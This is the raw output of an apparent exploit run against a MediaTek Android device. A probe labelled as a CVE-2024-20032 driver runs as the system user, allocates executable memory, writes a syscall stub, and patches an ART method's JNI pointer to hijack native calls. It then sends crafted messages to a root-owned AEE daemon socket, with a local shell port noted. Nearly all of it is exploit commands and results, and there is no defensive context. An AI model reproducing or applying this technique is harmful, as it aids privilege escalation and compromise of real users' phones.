command=CLASSPATH=/data/data/com.android.settings/cache/apusys_ioctl_probe.dex app_process64 /system/bin AeeSessionProbe --socket=com.mtk.aee.aed_64 --ind=11 --class=3 --payload
probe=aee-session
dex_md5=7883eb1d5546b5db5df4878db9c7b7f6
dex_sha256=9269cfb054ae8f3200b325f1fdbfc96bc54b73cac0b531f38e8a11b7d48f99cb
remote_dex=/data/data/com.android.settings/cache/apusys_ioctl_probe.dex
shell_port=127.0.0.1:48888
exit_status=0

uid=1000(system) gid=1000(system) groups=1000(system),3003(inet) context=u:r:system_app:s0
u:r:system_app:s0
7883eb1d5546b5db5df4878db9c7b7f6  /data/data/com.android.settings/cache/apusys_ioctl_probe.dex
[AeeSessionProbe] CVE-2024-20032 session driver
[AeeSessionProbe] uid=1000 pid=23919 target_pid=23919 class=3 ind=11 flags=0x0 payload=true
[+] Scratch buffer at 0x77a65aa000
[*] Trying anonymous PROT_RWX mmap...
[+] Anonymous RWX page at 0x77a6560000
[+] Wrote syscall stub: JNI@+0x00 (36B), call stub JNI@+0x80 (40B); entry_point left untouched
[*] ArtMethod for nativeSyscall at 0x77a1865a20
    access_flags = 0x10000108 [NATIVE]
    data (JNI ptr) = 0x74e681a2c0
    entry_point    = 0x103800080fc7c368
[*] Patching data_ (JNI) → 0x77a6560000
    data_       = 0x77a6560000 ✓
    entry_point = 0x103800080fc7c368 (unchanged)
[+] ArtMethod patched
[+] Syscall infrastructure ready

[session] @com.mtk.aee.aed_64 connected peer_uid=0
[session] IND ind=11 class=3 pid=23919 flags=0x0 payload=18
[session] IND bytes: 02 00 00 00 0b 00 00 00 6f 5d 00 00 03 00 00 00 12 00 00 00 00 00 00 00
[session] REQ#0 type=2 cmd=16(IND_LOG_CLOSE) seq=0 payload=0
[session] daemon IND cmd=16(IND_LOG_CLOSE) — session CLOSED
[session] no REQs on @com.mtk.aee.aed_64 (daemon may need crash state)
%n[phase-check] /data/vendor/aee_exp/
[aee_exp] empty
